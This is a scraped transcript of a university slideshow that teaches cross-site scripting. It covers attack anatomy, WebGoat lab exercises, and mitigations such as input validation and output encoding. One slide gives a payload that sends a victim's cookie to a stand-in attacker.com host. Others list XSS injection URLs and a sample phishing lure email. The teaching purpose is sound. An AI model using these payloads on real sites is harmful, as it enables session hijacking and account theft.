Presentation is loading. Please wait.

Presentation is loading. Please wait.

Cross Site Scripting (XSS) Charles Frank Northern Kentucky University.

Similar presentations

Presentation on theme: "Cross Site Scripting (XSS) Charles Frank Northern Kentucky University."— Presentation transcript:

1 Cross Site Scripting (XSS) Charles Frank Northern Kentucky University

2 March 4, 2009SIGCSE Cross-Site Scripting (XSS) Attacker causes a legitimate web server to send user executable content (Javascript, Flash ActiveScript) of attackers choosing. XSS used to obtain session ID for – Bank site (transfer money to attacker) – Shopping site (buy goods for attacker) – Key ideas – Attacker sends malicious code to server. – Victims browser loads code from server and runs it.

3 March 4, 2009SIGCSE Vulnerability Trends for 2006

4 March 4, 2009SIGCSE Anatomy of an XSS Attack 1.User logs into legitimate site. 2.Site sends user authentication cookie. 3.Attacker sends user XSS attack containing injected code. 4.User clicks on XSS link in , web, IM. 5.Browser contacts vulnerable URL at legitimate site with cookie in URL. 6.Legitimate site returns injected code in web page. 7.Browser runs injected code, which accesses evil site with cookie in URL. 8.Evil site records user cookie. 9.Attacker uses cookie to authenticate to legitimate site as user.

5 March 4, 2009SIGCSE XSS Example Client browser sends an error message to the web server. %2C+an +error+occurred

6 March 4, 2009SIGCSE XSS Example The error message is Reflected back from the Web server to the client in a web page. Sorry, an error occurred.

7 March 4, 2009SIGCSE XSS Example We can replace the error with JavaScript alert(xss);

8 March 4, 2009SIGCSE Proof of Concept

9 March 4, 2009SIGCSE Exploiting the Vulnerability 1.User logins in and is issued a cookie 2.Attacker feed the URL to user var+i=new+Image;+i.src=http://attacker.c om/%2bdocument.cookie;

10 March 4, 2009SIGCSE Exploiting the Vulnerability The server responds by sending the user a web page that runs the Java script. The code makes a request to containing the session token.

11 March 4, 2009SIGCSE Exploiting the Vulnerability The attacker monitors requests to He uses the captured session token to gain access to the users personal information and perform actions as the user.

12 March 4, 2009SIGCSE Snare From: Example Customer Services To: J Q Customer Dear Valued Customer, You have been selected to participate in our customer survey. Please complete our easy 5 question survey, and return we will credit $5 to your account.

13 March 4, 2009SIGCSE Snare To access the survey, please log in to your account using your usual bookmark, and then click on the following link: kie...

14 March 4, 2009SIGCSE Reassuring The link contains the correct domain name (unlike phishing). The URL has been obfuscated It uses https

15 March 4, 2009SIGCSE Reflected XSS – Injected script returned by one-time message. – Requires tricking user to click on link. – Non-persistent. Only works when user clicks.

16 March 4, 2009SIGCSE Anatomy of an XSS Attack 1. Login 2. Cookie Web Server 3. XSS Attack Attacker User 4. User clicks on XSS link. 5. XSS URL 7. Browser runs injected code. Evil site saves ID. 8. Attacker hijacks user session. 6. Page with injected code.

17 March 4, 2009SIGCSE XSS URL Examples ttp:// "> alert(document.cookie) ge2.html?tw= alert(Test); alert( document.cookie) &frompage=4&page=1&ct=VVT V&mh=0&sh=0&RN=1 h_exe?search_text=_%22%3E%3Cscript%3Ealert%28docum ent.cookie%29%3C%2Fscript%3E

18 March 4, 2009SIGCSE Stored XSS – Injected script stored in comment, message, etc. – Requires ability to insert malicious code into web documents (comments, reviews, etc.) – Persistent until message deleted.

19 March 4, 2009SIGCSE Stored XSS Auction site that allows buyers to post questions and sellers to post responses. If an attacker can post a question containing a script, the attacker could get a user to bid without intending to or get the seller to close the auction and accept the attackers low bid.

20 March 4, 2009SIGCSE Why does XSS Work? Same-Origin Policy – Browser only allows Javascript from site X to access cookies and other data from site X. – Attacker needs to make attack come from site X. Vulnerable Server Program – Any program that returns user input without filtering out dangerous code.

21 March 4, 2009SIGCSE XSS Attacks MySpace worm (October 2005) – When someone viewed Samys profile: Set him as friend of viewer. Incorporated code in viewers profile. Paypal (2006) – XSS redirect used to steal money from Paypal users in a phishing scam. BBC, CBS (2006) – By following XSS link from, you could read an apparently valid story on the BBC or CBS site claiming that Bush appointed a 9-year old as head of the Information Security department.

22 March 4, 2009SIGCSE Impact of XSS 1.Attackers can hijack user accounts. 2.Attackers can hijack admin accounts too. 3.Attacker can do anything a user can do. 4.Difficult to track down source of attack.

23 March 4, 2009SIGCSE Mitigating XSS 1.Disallow HTML input 2.Allow only safe HTML tags 3.Filter output Replace HTML special characters in output ex: replace with > also replace (, ), #, & 4.Tagged cookies Include IP address in cookie and only allow access to original IP address that cookie was created for.

24 XSS Problem XSS is a complex problem that is not going away anytime soon. The browser is insecure by design. It understand JavaScript. It isnt the browsers job to determine what code is good or bad. Disabling scripting seriously dampens the users browsing experience. March 4, 2009SIGCSE

25 March 4, 2009SIGCSE Cross-Site Scripting Demo

26 OWASP WebGoat WASP_WebGoat_Project WASP_WebGoat_Project WebGoat 5.2 Standard WebGoat 5.2 Developer Run webgoat.bat to start Tomcat Enter in your browserhttp://localhost/WebGoat/attack March 4, 2009SIGCSE

27 OWASP WebGoat Username: guest Password: guest Start WebGoat March 4, 2009SIGCSE

28 Reflected XSS Attacks Solution: – Enter alert('Bang!') for the PIN value View Page Source – Edit | Find | Bang March 4, 2009SIGCSE

29 Stage 6: Blocked Reflected XSS You have to edit org.owasp.webgoat.lessons.CrossSiteScripting. Alter the method getRequestParameter. The body of the mehtod should look something like this: March 4, 2009SIGCSE

30 Stage 6: Blocked Reflected XSS String regex = "[\\s\\w-,]*"; String parameter = s.getParser().getRawParameter(name); Pattern pattern = Pattern.compile(regex); validate(parameter, pattern); return parameter; March 4, 2009SIGCSE

31 Stage 1: Stored XSS First Login as Tom with tom as password. Select Tom from the list and click on the View Profile Button. Now should appear Tom's Profile. March 4, 2009SIGCSE

32 Stage 1: Stored XSS Click on the 'Edit Profile' Button and try an XSS attack on the street field. For example: alert("Got Ya"); Click on the UpdateProfile Button and Log out. March 4, 2009SIGCSE

33 Stage 1: Stored XSS Now log in as Jerry with jerry as password. Select from the the list the profile of tom and hit the ViewProfile Button. March 4, 2009SIGCSE

34 Stage 2: Blocked Stored XSS using Input Validation Solution: You have to alter the method parseEmployeeProfile in the class which is placed in the package org.owasp.webgoat.lessons.CrossSiteScripting The place to code is marked! March 4, 2009SIGCSE

35 Stage 2: Blocked Stored XSS using Input Validation String regex = "[\\s\\w-,]*"; String stringToValidate = firstName+lastName+ssn+title+phone+addres s1+address2+ startDate+ccn+disciplinaryActionDate+ disciplinaryActionNotes+personalDescription; Pattern pattern = Pattern.compile(regex); validate(stringToValidate, pattern); March 4, 2009SIGCSE

36 Stage 2: Blocked Stored XSS using Input Validation This validation allows following: \s = whitespace: \t\n\x0B\f\r \w = word: a-zA-Z_0-9 and the characters - and, Use of any other character will throw a Validation Exception. March 4, 2009SIGCSE

37 Stage 3: Stored XSS Revisted Log in as David with david as password. Choose Bruce from the List and click on the 'ViewProfile' Button. March 4, 2009SIGCSE

38 Stage 4: Blocked XSS using Output Encoding You have to use a static method called encode(String s) which is part of the class org.owasp.webgoat.util.HtmlEncoder. This method changes all special characters in the string. Now you have to use this method in the getEmployeeProfile method in the org.owasp.webgoat.lessons.CrossSiteScripting class. Replace all answer_results.getString(someString) with HtmlEncoder.encode(answer_results.getString(someString)) and you are done. March 4, 2009SIGCSE

39 XSS References March 4, 2009SIGCSE

Download ppt "Cross Site Scripting (XSS) Charles Frank Northern Kentucky University."

Similar presentations

Ads by Google